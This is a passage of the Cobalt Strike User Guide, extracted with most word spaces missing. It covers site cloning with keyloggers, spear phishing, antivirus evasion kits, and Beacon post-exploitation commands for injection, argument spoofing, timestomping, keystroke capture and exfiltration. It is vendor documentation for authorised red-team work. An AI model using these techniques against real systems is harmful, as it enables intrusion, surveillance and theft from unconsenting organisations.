InitialAccess/CloneaSite figure48-UsingClient-sideAttacksfromMetasploit Clone a Site Beforesendinganexploittoatarget,ithelpstodressitup.CobaltStrike’swebsiteclonetoolcan helpwiththis.Thewebsiteclonetoolmakesalocalcopyofawebsitewithsomecodeaddedto fixlinksandimagessotheyworkasexpected. Tocloneawebsite,gotoSite Management -> Clone Site. figure49-WebsiteCloneTool CobaltStrikeUserGuide www.fortra.com page:84
InitialAccess/SpearPhishing It’spossibletoembedanattackintoaclonedsite.WritetheURLofyourattackintheEmbed fieldandCobaltStrikewilladdittotheclonedsitewithanIFRAME.Clickthe... buttontoselect oneoftherunningclient-sideexploits. Clonedwebsitescanalsocapturekeystrokes.ChecktheLog keystrokes on cloned sitebox. ThiswillinsertaJavaScriptkeyloggerintotheclonedsite. Toviewloggedkeystrokesorseevisitorstoyourclonedsite,gotoView -> Web Log. CheckEnable SSLtoservethiscontentoverSSL.Thisoptionisavailablewhenyouspecifya validSSLcertificateinyourMalleableC2profile.MakesuretheHostfieldmatchestheCNfield ofyourSSLcertificate.Thiswillavoidasituationwherethisfeaturefailsbecauseofamismatch betweenthesefields. Spear Phishing Nowthatyouhaveanunderstandingofclient-sideattacks,let’stalkabouthowtogettheattack totheuser.Themostcommonwayintoanorganization’snetworkisthroughspearphishing. CobaltStrike'sspearphishingtoolallowsyoutosendpixelperfectspearphishingmessages usinganarbitrarymessageasatemplate. Targets Beforeyousendaphishingmessage,youshouldassemblealistoftargets.CobaltStrike expectstargetsinatextfile.Eachlineofthefilecontainsonetarget.Thetargetmaybeanemail address.Youmayalsouseanemailaddress,atab,andaname.Ifprovided,anamehelps CobaltStrikecustomizeeachphish. Templates Next,youneedaphishingtemplate.Thenicethingabouttemplatesisthatyoumayreusethem betweenengagements.CobaltStrikeusessavedemailmessagesasitstemplates.Cobalt Strikewillstripattachments,dealwithencodingissues,andrewriteeachtemplateforeach phishingattack. Ifyou’dliketocreateacustomtemplate,composeamessageandsendittoyourself.Most emailclientshaveawaytogettheoriginalmessagesource.InGmail,clickthedownarrownext toReply andselectShow original.Savethismessagetoafileandthencongratulateyourself— you’vemadeyourfirstCobaltStrikephishingtemplate. YoumaywanttocustomizeyourtemplatewithCobaltStrike’stokens.CobaltStrikereplaces thefollowingtokensinyourtemplates: CobaltStrikeUserGuide www.fortra.com page:85
InitialAccess/SpearPhishing Token Description %To% Theemailaddressofthepersonthemessageissentto %To_Name% Thenameofthepersonthemessageissentto. %URL% ThecontentsoftheEmbedURLfieldinthespearphishingdialog. Sending Messages Nowthatyouhaveyourtargetsandatemplate,you’rereadytogophishing.Tostartthespear phishingtool,gotoAttacks ->Spear Phish. figure50-SpearPhishingTool Tosendaphishingmessage,youmustfirstimportyourlistofTargets.Youmayimportaflat text-filecontainingoneemailaddressperline.Importafilecontainingoneemailaddressand nameseparatedbyataborcommaforstrongermessagecustomization.Clickthefoldernext totheTargetsfieldtoimportyourtargetsfile. SetTemplatetoanemailmessagetemplate.ACobaltStrikemessagetemplateissimplya savedemailmessage.CobaltStrikewillstripunnecessaryheaders,removeattachments, rewriteURLs,re-encodethemessage,andrewriteitforyou.Clickonthefoldernexttothe Templatefieldtochooseone. CobaltStrikeUserGuide www.fortra.com page:86
InitialAccess/SpearPhishing YouhavetheoptiontoaddanAttachment.Thisisagreattimetouseoneofthesocial engineeringpackagesdiscussedearlier.CobaltStrikewilladdyourattachmenttotheoutgoing phishingmessage. CobaltStrikedoesnotgiveyouameanstocomposeamessage.Useanemailclient,writea message,andsendittoyourself.Mostwebmailclientsincludeameanstoseetheoriginal messagesource.InGMail,clickthedownarrownexttoReplyandselectShoworiginal. YoumayalsoaskCobaltStriketorewriteallURLsinthetemplatewithaURLofyourchoosing. SetEmbed URLtohaveCobaltStrikerewriteeachURLinthemessagetemplatetopointtothe embeddedURL.URLsaddedinthiswaywillcontainatokenthatallowsCobaltStriketotrace anyvisitorbacktothisparticularspearphishingattack.CobaltStrike'sreportingandweblog featurestakeadvantageofthistoken.Press...tochooseoneoftheCobaltStrikehostedsites you'vestarted. WhenyouembedaURL,CobaltStrikewillattach?id=%TOKEN%toit.Eachsentmessagewill getitsowntoken.CobaltStrikeusesthistokentomapwebsitevisitorstosentemails.Ifyou careaboutreporting,besuretokeepthisvalueinplace. SetMail Servertoanopenrelayorthemailexchangerecordforyourtarget.Ifnecessary,you mayalsoauthenticatetoamailservertosendyourphishingmessages. Press… nexttotheMailServerfieldtoconfigureadditionalserveroptions.Youmayspecifya usernameandpasswordtoauthenticatewith.TheRandomDelayoptiontellsCobaltStriketo randomlydelayeachmessagebyarandomtime,uptothenumberofsecondsyouspecify.If thisoptionisnotset,CobaltStrikewillnotdelayitsmessages. figure51-ConfigureMailServer SetBounce Totoanemailaddresswherebouncedmessagesshouldgo.Thisvaluewillnot affectthemessageyourtargetssee.PressPreview toseeanassembledmessagetooneof yourrecipients.Ifthepreviewlooksgood,pressSend todeliveryourattack. CobaltStrikeUserGuide www.fortra.com page:87
InitialAccess/SpearPhishing CobaltStrikesendsphishingmessagesthroughtheteamserver. CobaltStrikeUserGuide www.fortra.com page:88
PayloadArtifactsandAnti-virusEvasion/TheArtifactKit Payload Artifacts and Anti-virus Evasion Fortraregularlyfieldsquestionsaboutevasion.DoesCobaltStrikebypassanti-virusproducts? Whichanti-virusproductsdoesitbypass?Howoftenisthischecked? TheCobaltStrikedefaultartifactswilllikelybesnaggedbymostendpointsecuritysolutions. AlthoughevasionisnotagoalofthedefaultCobaltStrikeproduct,CobaltStrikedoesoffer someflexibility. You,theoperator,maychangetheexecutables,DLLs,applets,andscripttemplatesCobalt Strikeusesinitsworkflows.YoumayalsoexportCobaltStrike’sBeaconpayloadinavarietyof formatsthatworkwiththird-partytoolsdesignedtoassistwithevasion. ThischapterhighlightstheCobaltStrikefeaturesthatprovidethisflexibility. The Artifact Kit CobaltStrikeusestheArtifactKittogenerateitsexecutablesandDLLs.TheArtifactKitispartof theArsenalKit,whichcontainsacollectionofkits—asourcecodeframeworktobuild executablesandDLLsthatevadesomeanti-virusproducts. The Theory of the Artifact Kit Traditionalanti-virusproductsusesignaturestoidentifyknownbad.Ifweembedourknown badshellcodeintoanexecutable,ananti-virusproductwillrecognizetheshellcodeandflagthe executableasmalicious. Todefeatthisdetection,it’scommonforanattackertoobfuscatetheshellcodeinsomeway andplaceitinthebinary.Thisobfuscationprocessdefeatsanti-virusproductsthatuseasimple stringsearchtoidentifymaliciouscode. Manyanti-virusproductsgoastepfurther.Theseanti-virusproductssimulateexecutionofan executableinavirtualsandbox.Witheachemulatedstepofexecution,theanti-virusproduct checksforknownbadintheemulatedprocessspace.Ifknownbadshowsup,theanti-virus productflagstheexecutableorDLLasmalicious.Thistechniquedefeatsmanyencodersand packersthattrytohideknownbadfromsignature-basedanti-virusproducts. CobaltStrike’scountertothisissimple.Theanti-virussandboxhaslimitations.Itisnota completevirtualmachine.Therearesystembehaviorstheanti-virussandboxdoesnotemulate. CobaltStrikeUserGuide www.fortra.com page:89
PayloadArtifactsandAnti-virusEvasion/TheArtifactKit TheArtifactKitisacollectionofexecutableandDLLtemplatesthatrelyonsomebehaviorthat anti-virusproduct’sdonotemulatetorecovershellcodelocatedinsideofthebinary. Oneofthetechniques[see:src-common/bypass-pipe.cintheArtifactKit]generates executablesandDLLsthatserveshellcodetothemselvesoveranamedpipe.Ifananti-virus sandboxdoesnotemulatenamedpipes,itwillnotfindtheknownbadshellcode. Where Artifact Kit Fails Ofcourseit’spossibleforanti-virusproductstodefeatspecificimplementationsoftheArtifact Kit.Ifananti-virusvendorwritessignaturesfortheArtifactKittechniqueyouuse,thenthe executablesandDLLsitcreateswillgetcaught.Thisstartedtohappen,overtime,withthe defaultbypasstechniqueinCobaltStrike2.5andbelow.Ifyouwanttogetthemostfromthe ArtifactKit,youwilluseoneofitstechniquesasabasetobuildyourownArtifactKit implementation. Eventhatisn’tenoughthough.Someanti-virusproductscallhometotheanti-virusvendor’s servers.TherethevendormakesadeterminationiftheexecutableorDLLisknowngoodoran unknown,neverbeforeseen,executableorDLL.Someoftheseproductsautomaticallysend unknownexecutablesandDLLstothevendorforfurtheranalysisandwarntheusers.Others treatunknownexecutablesandDLLsasmalicious.Itdependsontheproductanditssettings. Thepoint:noamountof“obfuscation”isgoingtohelpyouinthissituation.You’reupagainsta differentkindofdefenseandwillneedtoworkarounditaccordingly.Treatthesesituationsthe samewayyouwouldtreatapplicationwhitelisting.Trytofindaknowngoodprogram(e.g., powershell)thatwillgetyourpayloadstagerintomemory. How to use the Artifact Kit GotoHelp ->Arsenal fromalicensedCobaltStriketodownloadtheArsenalKit.Youcanalso accesstheArsenaldirectlyat:https://www.cobaltstrike.com/scripts FortradistributestheArsenalKitasa.tgzfile.Usethetarcommandtoextractit.TheArsenalKit includestheArtifactkit,whichcanbebuiltwithotherkitsorasastandalonekit.SeetheArsenal KitREADME.mdfileforinformationonbuildingthekits. You’reencouragedtomodifytheArtifactKitanditstechniquestomakeitmeetyourneeds. WhileskilledCprogrammerscandomorewiththeArtifactKit,it’squitefeasibleforan adventurousnon-programmertoworkwiththeArtifactKittoo.Forexample,amajoranti-virus productlikestowritesignaturesfortheexecutablesinCobaltStrike’strialeachtimethereisa release.UpuntilCobaltStrike2.5,thetrialandlicensedversionsofCobaltStrikeusedthenamed pipetechniqueinitsexecutablesandDLLs.Thisvendorwouldwriteasignatureforthenamed CobaltStrikeUserGuide www.fortra.com page:90
PayloadArtifactsandAnti-virusEvasion/TheVeilEvasionFramework pipestringtheexecutableused.Defeatingtheirsignatures,releaseafterrelease,wasassimple aschangingthenameofthepipeinthepipetechnique’ssourcecode. The Veil Evasion Framework Veilisapopularframeworktogenerateexecutablesthatgetpastsomeanti-virusproducts.You mayuseVeiltogenerateexecutablesforCobaltStrike’spayloads. Steps
- GotoPayloads -> Stager Payload Generator.
- Choosethelisteneryouwanttogenerateanexecutablefor.
- SelectVeilastheOutputtype.
- PressGenerateandsavethefile.
- LaunchtheVeil Evasion Frameworkandchoosethetechniqueyouwanttouse.
- Veilwilleventuallyaskaboutshellcode.SelectVeil’soptiontosupplycustom shellcode.
- PasteinthecontentsofthefileCobaltStrike’spayloadgeneratormade.
- PressenterandyouwillhaveafreshVeil-madeexecutable. figure 52 - UsingVeiltoGenerateanExecutable Java Applet Attacks FortradistributesthesourcecodetoCobaltStrike’sAppletAttacksastheAppletKit.Thisisalso availablewithintheCobaltStrikearsenal.GotoHelp ->Arsenal anddownloadtheAppletKit. Usetheincludedbuild.shscripttobuildtheAppletKitonKaliLinux.ManyCobaltStrike customersusethisflexibilitytosignCobaltStrike’sJavaAppletattackswithacode-signing certificatethattheypurchased.Thisishighlyrecommended. CobaltStrikeUserGuide www.fortra.com page:91
PayloadArtifactsandAnti-virusEvasion/TheResourceKit TomakeCobaltStrikeuseyourAppletKitoverthebuilt-inone,loadtheapplet.cnascript includedwiththeAppletKit. OntheCobaltStrikeArsenalPageyouwillalsonoticethePower Applet.Thisisanalternate implementationofCobaltStrike’sJavaAppletattacksthatusesPowerShelltogetapayload intomemory.ThePowerAppletdemonstratestheflexibilityyouhavetorecreateCobaltStrike’s standardattacksinacompletelydifferentwayandstillusethemwithCobaltStrike’sworkflows. TomakeCobaltStrikeuseyourAppletKitoverthebuilt-inone,loadtheapplet.cnascript includedwiththeAppletKit. The Resource Kit TheResourceKitisCobaltStrike’smeanstochangetheHTA,PowerShell,Python,VBA,andVBS scripttemplatesCobaltStrikeusesinitsworkflows.TheResourceKitispartoftheArsenalKit, whichcontainsacollectionofkitsandisavailabletolicensedusersintheCobaltStrikearsenal. GotoHelp ->Arsenal todownloadtheArsenalKit. TheREADME.mdsuppliedwiththeResourceKitdocumentstheincludedscriptsandwhich featuresusethem.Toevadeaproduct,considerchangingstringsorbehaviorsinthesescripts. TomakeCobaltStrikeuseyourscripttemplatesoverthebuilt-inscripttemplates,loadeither thedist/arsenal_kit.cnaordist/resource/resources.cnascript.SeetheArsenalKitREADME.md fileformoreinformation. The Sleep Mask Kit TheSleepMaskKitisthesourcecodeforthesleepmaskfunctionthatisexecutedtoobfuscate Beacon,inmemory,priortosleeping.Thisobfuscationtechniquemaybeusedtoidentify Beacon.Todefeatthisdetection,CobaltStrikeprovidsanaggressorscriptthatallowstheuser tomodifyhowthesleepmaskfunctionlooksinmemory.Withthe4.5releasealistofheap recordstomaskandunmaskisincluded.GotoHelp -> ArsenaltodownloadtheArsenalKit whichincludestheSleepMaskKit.Yourlicensekeyisrequired. FormoreinformationontheSleepMaskKitseethearsenal-kit/README.mdandarsenal- kit/kits/sleepmask/README.mdfiles. CobaltStrikeUserGuide www.fortra.com page:92
PostExploitation/BeaconCovertC2Payload Post Exploitation Beacon Covert C2 Payload BeaconisCobaltStrikespayloadtomodeladvancedattackers.UseBeacontoegressanetwork overHTTP,HTTPS,orDNS.Youmayalsolimitwhichhostsegressanetworkbycontrolling peer-to-peerBeaconsoverWindowsnamedpipes. Beaconisflexibleandsupportsasynchronousandinteractivecommunication.Asynchronous communicationislowandslow.Beaconwillphonehome,downloaditstasks,andgotosleep. Interactivecommunicationhappensinreal-time. Beacon'snetworkindicatorsaremalleable.RedefineBeacon'scommunicationwithCobalt Strike'smalleableC2language.ThisallowsyoutocloakBeaconactivitytolooklikeother malwareorblend-inaslegitimatetraffic. The Beacon Console Right-clickonaBeaconsessionandselectinteracttoopenthatBeacon’sconsole.Theconsole isthemainuserinterfaceforyourBeaconsession.TheBeaconconsoleallowsyoutoseewhich taskswereissuedtoaBeaconandtoseewhenitdownloadsthem.TheBeaconconsoleisalso wherecommandoutputandotherinformationwillappear. figure53-CobaltStrikeBeaconConsole InbetweentheBeaconconsole’sinputandoutputisastatusbar.Thisstatusbarcontains informationaboutthecurrentsession.Initsdefaultconfiguration,thestatusbarshowsthe target’sNetBIOSname,theusernameandPIDofthecurrentsession,andtheBeacon’slast check-intime. CobaltStrikeUserGuide www.fortra.com page:93
PostExploitation/TheBeaconMenu Eachcommandthat’sissuedtoaBeacon,whetherthroughtheGUIortheconsole,willshowup inthiswindow.Ifateammateissuesacommand,CobaltStrikewillpre-fixthecommandwith theirhandle. YouwilllikelyspendmostofyourtimewithCobaltStrikeintheBeaconconsole.It’sworthyour timetobecomefamiliarwithitscommands.Typehelp intheBeaconconsoletoseeavailable commands.Typehelp followedbyacommandnametogetdetailedhelp. The Beacon Menu Right-clickonaBeaconorinsideofaBeacon’sconsoletoaccesstheBeaconmenu.Thisisthe samemenuusedtoopentheBeaconconsole.Thefollowingitemsareavailable: TheAccessmenucontainsoptionstomanipulatetrustmaterialandelevateyouraccess. TheExploremenuconsistsofoptionstoextractinformationandinteractwiththetarget’s system. ThePivotingmenuiswhereyoucansetuptoolstotunneltrafficthroughaBeacon. TheSessionmenuiswhereyoumanagethecurrentBeaconsession. figure54-CobaltStrikeBeaconMenu SomeofCobaltStrike’svisualizations(thepivotgraphandsessionstable)letyouselectmultiple Beaconsatonetime.Mostactionsthathappenthroughthismenuwillapplytoallselected Beaconsessions. Asynchronous and Interactive Operations CobaltStrikeUserGuide www.fortra.com page:94
PostExploitation/RunningCommands BeawarethatBeaconisanasynchronouspayload.Commandsdonotexecuterightaway.Each commandgoesintoaqueue.WhentheBeaconchecksin(connectstoyou),itwilldownload thesecommandsandexecutethemonebyone.Atthistime,Beaconwillalsoreportanyoutput ithasforyou.Ifyoumakeamistake,usetheclear commandtoclearthecommandqueuefor thecurrentBeacon. Bydefault,Beaconscheckineverysixtyseconds.YoumaychangethiswithBeacon’ssleep command.UsesleepfollowedbyatimeinsecondstospecifyhowoftenBeaconshouldcheck in.Youmayalsospecifyasecondnumberbetween0and99.Thisnumberisajitterfactor. Beaconwillvaryeachofitscheckintimesbytherandompercentageyouspecifyasajitter factor.Forexample,sleep 300 20,willforceBeacontosleepfor300secondswitha20%jitter percentage.Thismeans,Beaconwillsleepforarandomvaluebetween240sto300saftereach check-in. TomakeaBeaconcheckinmultipletimeseachsecond,trysleep 0.Thisisinteractivemode.In thismodecommandswillexecuterightaway.YoumustmakeyourBeaconinteractivebefore youtunneltrafficthroughit.AfewBeaconcommands(e.g.,browserpivot,desktop,etc.)will automaticallyputBeaconintointeractivemodeatthenextcheckin. Running Commands Beacon’sshell commandwilltaskaBeacontoexecuteacommandviacmd.exeonthe compromisedhost.Whenthecommandcompletes,Beaconwillpresenttheoutputtoyou. Usetherun commandtoexecuteacommandwithoutcmd.exe.Theruncommandwillpost outputtoyou.Theexecute commandrunsaprograminthebackgroundanddoesnotcapture output. Usethepowershell commandtoexecuteacommandwithPowerShellonthecompromised host.Usethepowerpick commandtoexecutePowerShellcmdletswithoutpowershell.exe. ThiscommandreliesontheUnmanagedPowerShelltechniquedevelopedbyLeeChristensen. Thepowershellandpowerpickcommandswilluseyourcurrenttoken. Thepsinject commandwillinjectUnmanagedPowerShellintoaspecificprocessandrunyour cmdletfromthatlocation. Thepowershell-import commandwillimportaPowerShellscriptintoBeacon.Futureusesof thepowershell,powerpick,andpsinjectcommandswillhavecmdletsfromtheimportedscript availabletothem.BeaconwillonlyholdonePowerShellscriptatatime.Importanemptyfileto cleartheimportedscriptfromBeacon. Theexecute-assembly commandwillrunalocal.NETexecutableasaBeaconpost- exploitationjob.YoumaypassargumentstothisassemblyasifitwererunfromaWindows command-lineinterface.Thiscommandwillalsoinherityourcurrenttoken. CobaltStrikeUserGuide www.fortra.com page:95
PostExploitation/SessionPassing IfyouwantBeacontoexecutecommandsfromaspecificdirectory,usethecd commandinthe BeaconconsoletoswitchtheworkingdirectoryoftheBeacon’sprocess.Thepwd command willtellyouwhichdirectoryyou’recurrentlyworkingfrom. Thesetenv commandwillsetanenvironmentvariable. BeaconcanexecuteBeaconObjectFileswithoutcreatinganewprocess.BeaconObjectFiles arecompiledCprograms,writtentoaspecificconvention,thatrunwithinaBeaconsession. Useinline-execute [args] toexecuteaBeaconObjectFilewiththespecifiedarguments.See Beacon Object Files on page 171formoreinformation. Session Passing CobaltStrike’sBeaconstartedoutasastablelifelinetokeepaccesstoacompromisedhost. Fromdayone,Beacon’sprimarypurposewastopassaccessestootherCobaltStrikelisteners. Usethespawn commandtospawnasessionforalistener.Thespawncommandacceptsan architecture(e.g.,x86,x64)andalistenerasitsarguments. Bydefault,thespawn commandwillspawnasessioninrundll32.exe.Analertadministrator mayfinditstrangethatrundll32.exeisperiodicallymakingconnectionstotheinternet.Finda betterprogram(e.g.,InternetExplorer)andusethespawnto commandtostatewhichprogram Beaconshouldspawnforitssessions. Thespawnto commandrequiresyoutospecifyanarchitecture(x86orx64)andafullpathtoa programtospawn,asneeded.Typespawnto byitselfandpressentertoinstructBeacontogo backtoitsdefaultbehavior. Typeinject followedbyaprocessidandalistenernametoinjectasessionintoaspecific process.Useps togetalistofprocessesonthecurrentsystem.Useinject [pid] x64 toinjecta 64-bitBeaconintoanx64process. Thespawnandinjectcommandsbothinjectapayloadstageintomemory.Ifthepayloadstage isanHTTP,HTTPS,orDNSBeaconanditcan’treachyou—youwillnotseeasession.Ifthe payloadstageisabindTCPorSMBBeacon,thesecommandswillautomaticallytrytolinkto andassumecontrolofthesepayloads. Usedllinject [pid] toinjectaReflectiveDLLintoaprocess. Usetheshinject [pid] [architecture] [/path/to/file.bin] commandtoinjectshellcode,froma localfile,intoaprocessontarget.Useshspawn [architecture] [/path/to/file.bin] tospawnthe “spawnto”processandinjectthespecifiedshellcodefileintothatprocess. Usedllload [pid] [c:\path\to\file.dll] toloadanon-diskDLLinanotherprocess. CobaltStrikeUserGuide www.fortra.com page:96
PostExploitation/AlternateParentProcesses Alternate Parent Processes Useppid [pid] toassignanalternateparentprocessforprogramsrunbyyourBeaconsession. Thisisameanstomakeyouractivityblendinwithnormalactionsonthetarget.Thecurrent Beaconsessionmusthaverightstothealternateparentandit’sbestifthealternateparent processexistsinthesamedesktopsessionasyourBeacon.Typeppid,withnoarguments,to haveBeaconlaunchprocesseswithnospoofedparent. Therunu commandwillexecuteacommandwithanotherprocessastheparent.This commandwillrunwiththerightsanddesktopsessionofitsalternateparentprocess.The currentBeaconsessionmusthavefullrightstothealternateparent.Thespawnu commandwill spawnatemporaryprocess,asachildofaspecifiedprocess,andinjectaBeaconpayload stageintoit. Thespawntovaluecontrolswhichprogramisusedasatemporaryprocess. Spoof Process Arguments EachBeaconhasaninternallistofcommandsitshouldspoofargumentsfor.WhenBeacon runsacommandthatmatchesalist,Beacon:
- Startsthematchedprocessinasuspendedstate(withthefakearguments)
- Updatestheprocessmemorywiththerealarguments
- Resumestheprocess Theeffectisthathostinstrumentationrecordingaprocesslaunchwillseethefakearguments. Thishelpsmaskyourrealactivity. Useargue [command] [fake arguments] toaddacommandtothisinternallist.The [command]portionmaycontainanenvironmentvariable.Useargue [command] toremovea commandfromthisinternallist.argue,byitself,liststhecommandsinthisinternallist. Theprocessmatchlogicisexact.IfBeacontriestolaunch“net.exe”,itwillnotmatchnet, NET.EXE,orc:\windows\system32\net.exefromitsinternallist.Itwillonlymatchnet.exe. x86Beaconcanonlyspoofargumentsinx86childprocesses.Likewise,x64Beaconcanonly spoofargumentsinx64childprocesses. Therealargumentsarewrittentothememoryspacethatholdsthefakearguments.Ifthereal argumentsarelongerthanthefakearguments,thecommandlaunchwillfail. Blocking DLLs in Child Processes CobaltStrikeUserGuide www.fortra.com page:97
PostExploitation/UploadandDownloadFiles Useblockdlls start toaskBeacontolaunchchildprocesseswithabinarysignaturepolicythat blocksnon-MicrosoftDLLsfromtheprocessspace.Useblockdlls stop todisablethisbehavior. ThisfeaturerequiresWindows10. Upload and Download Files download-Thiscommanddownloadstherequestedfile.Youdonotneedtoprovidequotes aroundafilenamewithspacesinit.Beaconisbuiltforlowandslowexfiltrationofdata. Duringeachcheck-in,Beaconwilldownloadafixedchunkofeachfileitstaskedtoget. ThesizeofthischunkdependsonBeacon’scurrentdatachannel.TheHTTPandHTTPS channelspulldatain512KBchunks. downloads-UsetoseealistoffiledownloadsinprogressforthecurrentBeacon. cancel-Issuethiscommand,followedbyafilename,tocanceladownloadthat’sinprogress. Youmayusewildcardswithyourcancelcommandtocancelmultiplefiledownloadsat once. upload-Thiscommanduploadsafiletothehost. timestomp-Whenyouuploadafile,youwillsometimeswanttoupdateitstimestampsto makeitblendinwithotherfilesinthesamefolder.Thiscommandwilldothis.The timestompcommandmatchestheModified,Accessed,andCreatedtimesofonefileto anotherfile. GotoView->DownloadsinCobaltStriketoseethefilesthatyourteamhasdownloadedsofar. Onlycompleteddownloadsshowupinthistab. Downloadedfilesarestoredontheteamserver.Tobringfilesbacktoyoursystem,highlight themhere,andpressSync Files.CobaltStrikethendownloadstheselectedfilestoafolderof yourchoosingonyoursystem. File Browser Beacon’sFileBrowserisanopportunitytoexplorethefilesonacompromisedsystem.Goto [Beacon] ->Explore ->File Browser toopenit. Youcanalsoissuethecommand,file_browser,toopenthefilebrowsertabstartinginthe currentdirectory. ThefilebrowserwillrequestalistingforthecurrentworkingdirectoryofBeacon.Whenthis resultarrives,thefilebrowserwillpopulate. CobaltStrikeUserGuide www.fortra.com page:98
PostExploitation/TheWindowsRegistry Theleft-handsideofthefilebrowserisatreewhichorganizestheknowndrivesandfoldersinto oneview.Theright-handsideofthefilebrowsershowsthecontentsofthecurrentfolder. figure55-FileBrowser Eachfilebrowsercachesthefolderlistingsitreceives.Acoloredfolderindicatesthefolder’s contentsareinthisfilebrowser’scache.Youmaynavigatetocachedfolderswithoutgenerating anewfilelistingrequest.PressRefresh toaskBeacontoupdatethecontentsofthecurrent folder. Adark-greyfoldermeansthefolder’scontentsarenotinthisfilebrowser’scache.Clickona folderinthetreetohaveBeacongenerateatasktolistthecontentsofthisfolder(andupdateits cache).Double-clickonadark-greyfolderintheright-handsidecurrentfolderviewtodothe same. Togoupafolder,pressthefolderbuttonnexttothefilepathabovetheright-handsidefolder detailsview.Iftheparentfolderisinthisfilebrowser’scache,youwillseetheresults immediately.Iftheparentfolderisnotinthefilebrowser’scache,thebrowserwillgeneratea tasktolistthecontentsoftheparentfolder. Right-clickafiletodownloadordeleteit. Toseewhichdrivesareavailable,pressList Drives. File System Commands YoumayprefertobrowseandmanipulatethefilesystemfromtheBeaconconsole. Usethels commandtolistfilesinthecurrentdirectory.Usemkdir tomakeadirectory.rm will removeafileorfolder.cp copiesafiletoadestination.mv movesafile. The Windows Registry CobaltStrikeUserGuide www.fortra.com page:99
PostExploitation/KeystrokesandScreenshots Usereg_query [x86|x64] [HIVE\path\to\key] toqueryaspecifickeyintheregistry.This commandwillprintthevalueswithinthatkeyandalistofanysubkeys.Thex86/x64optionis requiredandforcesBeacontousetheWOW64(x86)ornativeviewoftheregistry.reg_query [x86|x64] [HIVE\path\to\key] [value] willqueryaspecificvaluewithinaregistrykey. Keystrokes and Screenshots Beacon’stoolstologkeystrokesandtakescreenshotsaredesignedtoinjectintoanother processandreporttheirresultstoyourBeacon. Tostartthekeystrokelogger,usekeylogger pid x86 toinjectintoanx86process.Use keylogger pid x64 toinjectintoanx64process.Usekeylogger byitselftoinjectthekeystroke loggerintoatemporaryprocess.Thekeystrokeloggerwillmonitorkeystrokesfromtheinjected processandreportthemtoBeaconuntiltheprocessterminatesoryoukillthekeystrokelogger post-exploitationjob. Beawarethatmultiplekeystrokeloggersmayconflictwitheachother.Useonlyonekeystroke loggerperdesktopsession. Totakeascreenshot,usescreenshot pid x86 toinjectthescreenshottoolintoanx86process. Usescreenshot pid x64 toinjectintoanx64process.Thisvariantofthescreenshotcommand willtakeonescreenshotandexit.screenshot,byitself,willinjectthescreenshottoolintoa temporaryprocess. Thescreenwatch command(withoptionstouseatemporaryprocessorinjectintoanexplicit process)willcontinuouslytakescreenshotsuntilyoustopthescreenwatchpost-exploitation job. Usetheprintscreen command(alsowithtemporaryprocessandinjectoptions)totakea screenshotbyadifferentmethod.ThiscommandusesaPrintScrkeypresstoplacethe screenshotontotheuser'sclipboard.Thisfeaturerecoversthescreenshotfromtheclipboard andreportsitbacktoyou. WhenBeaconreceivesnewscreenshotsorkeystrokes,itwillpostamessagetotheBeacon console.ThescreenshotandkeystrokeinformationisnotavailablethroughtheBeaconconsole though.GotoView ->Keystrokes toseeloggedkeystrokesacrossallofyourBeaconsessions. GotoView ->Screenshots tobrowsethroughscreenshotsfromallofyourBeaconsessions. Bothofthesedialogsupdateasnewinformationcomesin.Thesedialogsmakeiteasyforone operatortomonitorkeystrokesandscreenshotsonallofyourBeaconsessions. Controlling Beacon Jobs CobaltStrikeUserGuide www.fortra.com page:100
PostExploitation/TheProcessBrowser SeveralBeaconfeaturesrunasjobsinanotherprocess(e.g.,thekeystrokeloggerand screenshottool).Thesejobsruninthebackgroundandreporttheiroutputwhenit’savailable. Usethejobs commandtoseewhichjobsarerunninginyourBeacon.Usejobkill [job number] tokillajob. The Process Browser TheProcessBrowserdoestheobvious;ittasksaBeacontoshowalistofprocessesandshows thisinformationtoyou.Goto[beacon] -> Explore -> Show ProcessestoopentheProcess Browser. Youcanalsoissuethecommand,process_browser,toopentheprocessbrowsertabstarting inthecurrentdirectory. figure56-ProcessBrowser Theleft-handsideshowstheprocessesorganizedintoatree.Thecurrentprocessforyour Beaconishighlightedyellow. Theright-handsideshowstheprocessdetails.TheProcessBrowserisalsoaconvenientplace toimpersonateatokenfromanotherprocess,deploythescreenshottool,ordeploythe keystrokelogger. Highlightoneormoreprocessesandpresstheappropriatebuttonatthebottomofthetab. IfyouhighlightmultipleBeaconsandtaskthemtoshowprocesses,CobaltStrikewillshowa ProcessBrowserthatalsostateswhichhosttheprocesscomesfrom.Thisvariantofthe ProcessBrowserisaconvenientwaytodeployBeacon’spost-exploitationtoolstomultiple systemsatonce. CobaltStrikeUserGuide www.fortra.com page:101
PostExploitation/DesktopControl Simplysortbyprocessname,highlighttheinterestingprocessesonyourtargetsystems,and presstheScreenshotorLog Keystrokesbuttontodeploythesetoolstoallhighlighted systems. Desktop Control Tointeractwithadesktoponatargethost,goto[beacon] -> Explore -> Desktop (VNC).This willstageaVNCserverintothememoryofthecurrentprocessandtunneltheconnection throughBeacon. WhentheVNCserverisready,CobaltStrikewillopenatablabeledDesktop HOST@PID. YoumayalsouseBeacon’sdesktop commandtoinjectaVNCserverintoaspecificprocess. Usedesktop pid architecture low|high.Thelastparameterlet’syouspecifyaqualityforthe VNCsession. figure57-CobaltStrikeDesktopViewer Thebottomofthedesktoptabhasseveralbuttons.Theseare: Refreshthescreen Viewonly DecreaseZoom IncreaseZoom CobaltStrikeUserGuide www.fortra.com page:102
PostExploitation/PrivilegeEscalation Zoomto100% AdjustZoomtoFit Tab SendCtrl+Escape LocktheCtrlkey LocktheAltkey Ifyoucan’ttypeinaDesktoptab,checkthestateoftheCtrl andAlt buttons.Wheneitherbutton ispressed,allofyourkeystrokesaresentwiththeCtrlorAltmodifier.PresstheCtrl orAlt buttontoturnoffthisbehavior.MakesureView only isn’tpressedeither.Topreventyoufrom accidentallymovingthemouse, View only ispressedbydefault. Privilege Escalation Somepost-exploitationcommandsrequiresystemadministrator-levelrights.Beaconincludes severaloptionstohelpyouelevateyouraccessincludingthefollowing: NOTE: Typehelp intheBeaconconsoletoseeavailablecommands.Typehelp followedbya commandnametoseedetailedhelp. Elevate with an Exploit elevate-ThiscommandlistsprivilegeescalationexploitsregisteredwithCobaltStrike. elevate [exploit] [listener]-Thiscommandattemptstoelevatewithaspecificexploit. CobaltStrikeUserGuide www.fortra.com page:103
